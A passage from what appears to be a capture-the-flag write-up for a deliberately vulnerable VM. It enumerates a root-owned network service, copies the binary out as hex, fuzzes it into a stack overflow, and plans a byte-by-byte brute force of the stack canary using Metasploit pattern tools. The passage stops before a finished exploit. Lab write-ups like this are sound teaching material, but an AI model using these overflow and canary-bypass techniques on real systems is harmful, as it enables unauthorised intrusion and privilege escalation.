<span class='line-number'>87</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ ps -ef
</span><span class='line'>UID        PID  PPID  C STIME TTY          TIME CMD
</span><span class='line'>root         1     0  0 12:50 ?        00:00:01 /sbin/init
</span><span class='line'>root         2     0  0 12:50 ?        00:00:00 [kthreadd]
</span><span class='line'>root         3     2  0 12:50 ?        00:00:00 [migration/0]
</span><span class='line'>root         4     2  0 12:50 ?        00:00:00 [ksoftirqd/0]
</span><span class='line'>root         5     2  0 12:50 ?        00:00:00 [migration/0]
</span><span class='line'>root         6     2  0 12:50 ?        00:00:00 [watchdog/0]
</span><span class='line'>root         7     2  0 12:50 ?        00:00:00 [events/0]
</span><span class='line'>root         8     2  0 12:50 ?        00:00:00 [cgroup]
</span><span class='line'>root         9     2  0 12:50 ?        00:00:00 [khelper]
</span><span class='line'>root        10     2  0 12:50 ?        00:00:00 [netns]
</span><span class='line'>root        11     2  0 12:50 ?        00:00:00 [async/mgr]
</span><span class='line'>root        12     2  0 12:50 ?        00:00:00 [pm]
</span><span class='line'>root        13     2  0 12:50 ?        00:00:00 [sync_supers]
</span><span class='line'>root        14     2  0 12:50 ?        00:00:00 [bdi-default]
</span><span class='line'>root        15     2  0 12:50 ?        00:00:00 [kintegrityd/0]
</span><span class='line'>root        16     2  0 12:50 ?        00:00:00 [kblockd/0]
</span><span class='line'>root        17     2  0 12:50 ?        00:00:00 [kacpid]
</span><span class='line'>root        18     2  0 12:50 ?        00:00:00 [kacpi_notify]
</span><span class='line'>root        19     2  0 12:50 ?        00:00:00 [kacpi_hotplug]
</span><span class='line'>root        20     2  0 12:50 ?        00:00:00 [ata_aux]
</span><span class='line'>root        21     2  0 12:50 ?        00:00:00 [ata_sff/0]
</span><span class='line'>root        22     2  0 12:50 ?        00:00:00 [ksuspend_usbd]
</span><span class='line'>root        23     2  0 12:50 ?        00:00:00 [khubd]
</span><span class='line'>root        24     2  0 12:50 ?        00:00:00 [kseriod]
</span><span class='line'>root        25     2  0 12:50 ?        00:00:00 [md/0]
</span><span class='line'>root        26     2  0 12:50 ?        00:00:00 [md_misc/0]
</span><span class='line'>root        27     2  0 12:50 ?        00:00:00 [linkwatch]
</span><span class='line'>root        28     2  0 12:50 ?        00:00:00 [khungtaskd]
</span><span class='line'>root        29     2  0 12:50 ?        00:00:00 [kswapd0]
</span><span class='line'>root        30     2  0 12:50 ?        00:00:00 [ksmd]
</span><span class='line'>root        31     2  0 12:50 ?        00:00:00 [aio/0]
</span><span class='line'>root        32     2  0 12:50 ?        00:00:00 [crypto/0]
</span><span class='line'>root        37     2  0 12:50 ?        00:00:00 [kthrotld/0]
</span><span class='line'>root        38     2  0 12:50 ?        00:00:00 [pciehpd]
</span><span class='line'>root        40     2  0 12:50 ?        00:00:00 [kpsmoused]
</span><span class='line'>root        41     2  0 12:50 ?        00:00:00 [usbhid_resumer]
</span><span class='line'>root        72     2  0 12:50 ?        00:00:00 [kstriped]
</span><span class='line'>root       144     2  0 12:50 ?        00:00:00 [scsi_eh_0]
</span><span class='line'>root       145     2  0 12:50 ?        00:00:00 [scsi_eh_1]
</span><span class='line'>root       152     2  0 12:50 ?        00:00:00 [mpt_poll_0]
</span><span class='line'>root       153     2  0 12:50 ?        00:00:00 [mpt/0]
</span><span class='line'>root       154     2  0 12:50 ?        00:00:00 [scsi_eh_2]
</span><span class='line'>root       275     2  0 12:50 ?        00:00:00 [kdmflush]
</span><span class='line'>root       277     2  0 12:50 ?        00:00:00 [kdmflush]
</span><span class='line'>root       294     2  0 12:50 ?        00:00:00 [jbd2/dm-0-8]
</span><span class='line'>root       295     2  0 12:50 ?        00:00:00 [ext4-dio-unwrit]
</span><span class='line'>root       376     1  0 12:50 ?        00:00:00 /sbin/udevd -d
</span><span class='line'>root       557     2  0 12:50 ?        00:00:00 [vmmemctl]
</span><span class='line'>root       692     2  0 12:50 ?        00:00:00 [jbd2/sda1-8]
</span><span class='line'>root       693     2  0 12:50 ?        00:00:00 [ext4-dio-unwrit]
</span><span class='line'>root       727     2  0 12:50 ?        00:00:00 [kauditd]
</span><span class='line'>root       878     2  0 12:50 ?        00:00:00 [flush-253:0]
</span><span class='line'>root       908     1  0 12:50 ?        00:00:00 /sbin/dhclient -q -lf /var/lib/d
</span><span class='line'>root       949     1  0 12:50 ?        00:00:00 auditd
</span><span class='line'>root       965     1  0 12:50 ?        00:00:00 /sbin/rsyslogd -i /var/run/syslo
</span><span class='line'>root      1017     1  0 12:50 ?        00:00:00 /usr/sbin/sshd
</span><span class='line'>root      1093     1  0 12:50 ?        00:00:00 /usr/libexec/postfix/master
</span><span class='line'>postfix   1100  1093  0 12:50 ?        00:00:00 qmgr -l -t fifo -u
</span><span class='line'>root      1103     1  0 12:50 ?        00:00:00 crond
</span><span class='line'>root      1114     1  0 12:50 ?        00:00:00 /usr/local/bin/wopr
</span><span class='line'>root      1117     1  0 12:50 ?        00:00:00 php-fpm: master process (/etc/ph
</span><span class='line'>root      1121     1  0 12:50 ?        00:00:00 nginx: master process /usr/sbin/
</span><span class='line'>nginx     1122  1121  0 12:50 ?        00:00:18 nginx: worker process
</span><span class='line'>nginx     1124  1117  0 12:50 ?        00:00:00 php-fpm: pool www
</span><span class='line'>nginx     1125  1117  0 12:50 ?        00:00:00 php-fpm: pool www
</span><span class='line'>nginx     1126  1117  0 12:50 ?        00:00:00 php-fpm: pool www
</span><span class='line'>nginx     1127  1117  0 12:50 ?        00:00:00 php-fpm: pool www
</span><span class='line'>nginx     1128  1117  0 12:50 ?        00:00:00 php-fpm: pool www
</span><span class='line'>root      1131     1  0 12:50 tty1     00:00:00 /sbin/mingetty /dev/tty1
</span><span class='line'>root      1133     1  0 12:50 tty2     00:00:00 /sbin/mingetty /dev/tty2
</span><span class='line'>root      1137     1  0 12:50 tty3     00:00:00 /sbin/mingetty /dev/tty3
</span><span class='line'>root      1141     1  0 12:50 tty4     00:00:00 /sbin/mingetty /dev/tty4
</span><span class='line'>root      1142   376  0 12:50 ?        00:00:00 /sbin/udevd -d
</span><span class='line'>root      1144   376  0 12:50 ?        00:00:00 /sbin/udevd -d
</span><span class='line'>root      1145     1  0 12:50 tty5     00:00:00 /sbin/mingetty /dev/tty5
</span><span class='line'>root      1147     1  0 12:50 tty6     00:00:00 /sbin/mingetty /dev/tty6
</span><span class='line'>nginx     1642  1117  0 13:53 ?        00:00:00 php-fpm: pool www
</span><span class='line'>nginx     1643  1117  0 13:53 ?        00:00:00 php-fpm: pool www
</span><span class='line'>postfix   1931  1093  0 14:30 ?        00:00:00 pickup -l -t fifo -u
</span><span class='line'>root      2521  1017  0 15:32 ?        00:00:00 sshd: avida [priv]
</span><span class='line'>avida     2525  2521  0 15:32 ?        00:00:00 sshd: avida@pts/0
</span><span class='line'>avida     2526  2525  0 15:32 pts/0    00:00:00 -rbash
</span><span class='line'>avida     2612  2526  0 15:39 pts/0    00:00:00 ftp
</span><span class='line'>avida     2613  2612  0 15:40 pts/0    00:00:00 /bin/bash
</span><span class='line'>avida     2710  2613  0 15:53 pts/0    00:00:00 ps -ef</span></code></pre></td></tr></table></div></figure>


<p>Hmmmm, seems most of the standard stuff&hellip; but hang on - /usr/local/bin/wopr - what&rsquo;s that?!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ ls /usr/local/bin/wopr 
</span><span class='line'>-rwxr-xr-x. 1 root root 7878 Apr 28 07:43 /usr/local/bin/wopr</span></code></pre></td></tr></table></div></figure>


<p>Promising! Running as root. Let&rsquo;s try to run it again:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ /usr/local/bin/wopr 
</span><span class='line'>bind: Address already in use</span></code></pre></td></tr></table></div></figure>


<p>Cool! Let&rsquo;s see what addresses are in use then - must be some kind of a server running&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ netstat -ant
</span><span class='line'>Active Internet connections (servers and established)
</span><span class='line'>Proto Recv-Q Send-Q Local Address               Foreign Address             State      
</span><span class='line'>tcp        0      0 0.0.0.0:3333                0.0.0.0:*                   LISTEN      
</span><span class='line'>tcp        0      0 127.0.0.1:9000              0.0.0.0:*                   LISTEN      
</span><span class='line'>tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      
</span><span class='line'>tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      
</span><span class='line'>tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      
</span><span class='line'>tcp        0      0 172.16.246.128:22           172.16.246.129:60442        ESTABLISHED 
</span><span class='line'>tcp        0      0 :::22                       :::*                        LISTEN      
</span><span class='line'>tcp        0      0 ::1:25                      :::*                        LISTEN      </span></code></pre></td></tr></table></div></figure>


<p>Alright, let&rsquo;s connect to port 3333.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ nc localhost 3333
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>&gt; yes
</span><span class='line'>[+] yeah, I don't think so
</span><span class='line'>[+] bye!</span></code></pre></td></tr></table></div></figure>


<p>So we have an exploitable (apparently) server listening locally that accepts user input. Tried few inputs like &ldquo;help&rdquo;, &ldquo;options&rdquo;, &ldquo;usage&rdquo;, but they all didn&rsquo;t work - seems that it doesn&rsquo;t really do anything.</p>

<p>But, since it accepts user input and doesn&rsquo;t seem to sanitize its length, that sounds like a possibility of a buffer overflow vulnerability!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ python -c '"A" * 30000' | nc localhost 3333
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>&gt; [+] yeah, I don't think so
</span><span class='line'>[+] bye!</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s see what the binary has to tell us about itself.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ file /usr/local/bin/wopr 
</span><span class='line'>/usr/local/bin/wopr: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
</span><span class='line'>bash-4.1$ strings /usr/local/bin/wopr 
</span><span class='line'>/lib/ld-linux.so.2
</span><span class='line'>__gmon_start__
</span><span class='line'>libc.so.6
</span><span class='line'>_IO_stdin_used
</span><span class='line'>socket
</span><span class='line'>exit
</span><span class='line'>htons
</span><span class='line'>perror
</span><span class='line'>puts
</span><span class='line'>fork
</span><span class='line'>__stack_chk_fail
</span><span class='line'>listen
</span><span class='line'>memset
</span><span class='line'>__errno_location
</span><span class='line'>bind
</span><span class='line'>read
</span><span class='line'>memcpy
</span><span class='line'>setsockopt
</span><span class='line'>waitpid
</span><span class='line'>close
</span><span class='line'>accept
</span><span class='line'>__libc_start_main
</span><span class='line'>setenv
</span><span class='line'>write
</span><span class='line'>GLIBC_2.4
</span><span class='line'>GLIBC_2.0
</span><span class='line'>PTRhP
</span><span class='line'>[^_]
</span><span class='line'>[+] yeah, I don't think so
</span><span class='line'>socket
</span><span class='line'>setsockopt
</span><span class='line'>bind
</span><span class='line'>[+] bind complete
</span><span class='line'>listen
</span><span class='line'>/tmp/log
</span><span class='line'>TMPLOG
</span><span class='line'>[+] waiting for connections
</span><span class='line'>[+] logging queries to $TMPLOG
</span><span class='line'>accept
</span><span class='line'>[+] got a connection
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>[+] bye!</span></code></pre></td></tr></table></div></figure>


<p>Sweet, it&rsquo;s not packed so we can actually see some stuff. Couple things that stand out:</p>

<ul>
<li>socket</li>
<li>fork</li>
<li>memcpy</li>
<li>setenv</li>
<li>TMPLOG</li>
<li>/tmp/log</li>
</ul>


<p>From that, we can deduct in a very high level what the binary may be doing - server listening for connections, upon new connection forks a new process and obtains user input via memcpy function. There&rsquo;s also setenv, that probably sets TMPLOG variable to /tmp/log. Unfortunately, /tmp/log doesn&rsquo;t exist so it doesn&rsquo;t provide any useful information&hellip; at least not at the moment!</p>

<p>Alright, let&rsquo;s do some more analysis and testing on the binary itself. I want to be able to run it in my own environment and see how it behaves, debug and see what I can do with it. For this I&rsquo;ll need a very close replica of the environment it&rsquo;s already running on, so I went ahead and downloaded Centos 6.5 with the same kernel and set-up another VM.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ uname -a
</span><span class='line'>Linux persistence 2.6.32-431.5.1.el6.i686 #1 SMP Tue Feb 11 21:56:33 UTC 2014 i686 i686 i386 GNU/Linux
</span><span class='line'>bash-4.1$ cat /etc/*release
</span><span class='line'>CentOS release 6.5 (Final)</span></code></pre></td></tr></table></div></figure>


<p>Having all that, now I needed wopr binary. Since I still can&rsquo;t copy stuff across due to firewall restrictions, without messing around too much I thought of this quick and nasty way of copying it across - simply copying hex value of it and recreating it on my local CentOS VM.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ xxd -p /usr/local/bin/wopr 
</span><span class='line'>7f454c460101010000000000000000000200030001000000c08604083400
</span><span class='line'>0000801100000000000034002000090028001e001b000600000034000000
</span><span class='line'>348004083480040820010000200100000500000004000000030000005401
</span><span class='line'>000054810408548104081300000013000000040000000100000001000000
</span><span class='line'>000000000080040800800408c00d0000c00d000005000000001000000100
</span><span class='line'>0000140f0000149f0408149f0408440100004c0100000600000000100000
</span><span class='line'>02000000280f0000289f0408289f0408c8000000c8000000060000000400
</span><span class='line'>000004000000680100006881040868810408440000004400000004000000
</span><span class='line'>0400000050e57464200d0000208d0408208d040824000000240000000400
</span><span class='line'>00000400000051e574640000000000000000000000000000000000000000
</span><span class='line'>060000000400000052e57464140f0000149f0408149f0408ec000000ec00
</span><span class='line'>000004000000010000002f6c69622f6c642d6c696e75782e736f2e320000
</span><span class='line'>                     ...(truncated)...</span></code></pre></td></tr></table></div></figure>


<p>Copy-pase output into a text file called wopr.hex on local CentOS and recreate binary from hex:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ cat wopr.hex | xxd -r -p &gt; wopr</span></code></pre></td></tr></table></div></figure>


<p>Alright, now we have the binary on our local CentOS and we can successfully run it, debug it and do whatever we like with it! Unfortunately CentOS didn&rsquo;t come with nc and gdb by default, so needed to download it with yum.</p>

<p>Ok, let&rsquo;s run it and see is there any more information displayed on the server side that could be useful in our research. Run the server, connect to it and provide some random size input:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ chmod 755 wopr
</span><span class='line'>[knaps@localhost ~]$ ./wopr
</span><span class='line'>[+] bind complete
</span><span class='line'>[+] waiting for connections
</span><span class='line'>[+] logging queries to $TMPLOG</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ python -c 'print "A" * 500' | nc localhost 3333</span></code></pre></td></tr></table></div></figure>


<p>Sweet, some interesting stuff! Look at this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>[+] got a connection
</span><span class='line'>*** stack smashing detected ***: ./wopr terminated
</span><span class='line'>======= Backtrace: =========
</span><span class='line'>/lib/libc.so.6(__fortify_fail+0x4d)[0x727f4d]
</span><span class='line'>/lib/libc.so.6(+0xfcefa)[0x727efa]
</span><span class='line'>./wopr[0x80487dc]
</span><span class='line'>[0x41414141]
</span><span class='line'>======= Memory map: ========
</span><span class='line'>001c3000-001e0000 r-xp 00000000 08:02 394237     /lib/libgcc_s-4.4.7-20120601.so.1
</span><span class='line'>001e0000-001e1000 rw-p 0001d000 08:02 394237     /lib/libgcc_s-4.4.7-20120601.so.1
</span><span class='line'>
</span><span class='line'>...(truncated)...</span></code></pre></td></tr></table></div></figure>


<p>Looks like we have overwritten return address with &ldquo;A&#8221;s (0x41414141), muahaha!.</p>

<p>But wait, there&rsquo;s a problem - what is this crap?!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>*** stack smashing detected ***: ./wopr terminated</span></code></pre></td></tr></table></div></figure>


<p>After some research, it looks like it&rsquo;s a Stack Smashing Protection (SSP) and here we are introduced to the first hurdle - a canary.</p>

<p>So what&rsquo;s a canary? It&rsquo;s simply a value placed on a stack before the return address that is checked after returning from a function. If it&rsquo;s changed, that means someone was trying to overflow the buffer and get to the return address, so the program will throw an exception and terminate. Otherwise, it will happily run.</p>

<p>So what we&rsquo;ll need to do? Overwrite a canary with its original value while overflowing our way to return address! Yeah&hellip; but there&rsquo;s a problem - canary is a completely random value, so good luck, it will be pretty much impossible to come up with a winning combination in a reasonable time. We&rsquo;ll need to come up with something more clever than that&hellip;</p>

<p>Let&rsquo;s run gdb and disasemble our program. Without pasting in the whole input here, after quick high level analysis we can see that the server creates a socket and listens for new connections, when new connection comes in, new process is forked and then get_reply command invoked that contains canary checking code and vulnerable function memcpy. See snippets below:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x08048821 &lt;+67&gt;:    movl   $0x0,0x8(%esp)
</span><span class='line'>   0x08048829 &lt;+75&gt;:    movl   $0x1,0x4(%esp)
</span><span class='line'>   0x08048831 &lt;+83&gt;:    movl   $0x2,(%esp)
</span><span class='line'>   0x08048838 &lt;+90&gt;:    call   0x804860c &lt;socket@plt&gt;
</span><span class='line'>
</span><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x08048a09 &lt;+555&gt;:   call   0x804867c &lt;fork@plt&gt;
</span><span class='line'>
</span><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x08048ad1 &lt;+755&gt;:   call   0x8048774 &lt;get_reply&gt;
</span><span class='line'>
</span><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x0804878c &lt;+24&gt;:    mov    %gs:0x14,%eax
</span><span class='line'>   0x08048792 &lt;+30&gt;:    mov    %eax,-0x4(%ebp)                         =====&gt;&gt;  Setting the canary
</span><span class='line'>
</span><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x080487ab &lt;+55&gt;:    call   0x804861c &lt;memcpy@plt&gt;
</span><span class='line'>
</span><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>   0x080487cb &lt;+87&gt;:    mov    -0x4(%ebp),%eax
</span><span class='line'>   0x080487ce &lt;+90&gt;:    xor    %gs:0x14,%eax                           =====&gt;&gt;  Checking the canary
</span><span class='line'>   0x080487d5 &lt;+97&gt;:    je     0x80487dc &lt;get_reply+104&gt;
</span><span class='line'>   0x080487d7 &lt;+99&gt;:    call   0x804865c &lt;__stack_chk_fail@plt&gt;
</span><span class='line'>   0x080487dc &lt;+104&gt;:   leave  
</span><span class='line'>   0x080487dd &lt;+105&gt;:   ret    
</span><span class='line'>
</span><span class='line'>...(truncated)...</span></code></pre></td></tr></table></div></figure>


<p>Wait, wait, wait&hellip; new child processes are created with fork! See this quote from man pages:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>fork() creates a new process by duplicating the calling process. The new process, referred to as the child, is an exact duplicate of the calling process (...)</span></code></pre></td></tr></table></div></figure>


<p>This includes canaries! Forked process will have exactly the same canary as a parent process&hellip; what does it give us? Well, since it&rsquo;s a server and constantly accepting new connections (therefore forking new processes with exactly the same canary) we can guess the canary! And to make it a lot quicker, we can try to guess it byte by byte in order to speed up the process. Sweet!</p>

<p>There are few bits missing before we can attempt guessing the canary - we need to know the size of a buffer, offset of a canary and of a return address. Canary sits immediatelly before the saved base pointer and return address and is 4 bytes long. See below illustration of a stack:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>.
</span><span class='line'>    ------------------
</span><span class='line'>    |                |
</span><span class='line'>    |                |
</span><span class='line'>    |     Buffer     |   x bytes
</span><span class='line'>    |                |
</span><span class='line'>    |                |
</span><span class='line'>    ------------------
</span><span class='line'>    |     Canary     |   4 bytes
</span><span class='line'>    ------------------
</span><span class='line'>    |  Base pointer  |   4 bytes
</span><span class='line'>    ------------------
</span><span class='line'>    | Return address |   4 bytes
</span><span class='line'>    ------------------
</span><span class='line'>    |       ...      |</span></code></pre></td></tr></table></div></figure>


<p>Alright, let&rsquo;s get to work. To find all necessary offsets we&rsquo;ll use metasploit tool to generate unique pattern of characters of a given length. This way we&rsquo;ll be able to figure out where exactly in the string given bytes are that were used to overwrite return address.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 500
</span><span class='line'>Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq</span></code></pre></td></tr></table></div></figure>


<p>Now let&rsquo;s paste it as an input to our server:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ nc localhost 3333
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>&gt; Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
</span><span class='line'>[+] yeah, I don't think so</span></code></pre></td></tr></table></div></figure>


<p>Check the value of return address in our server output:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
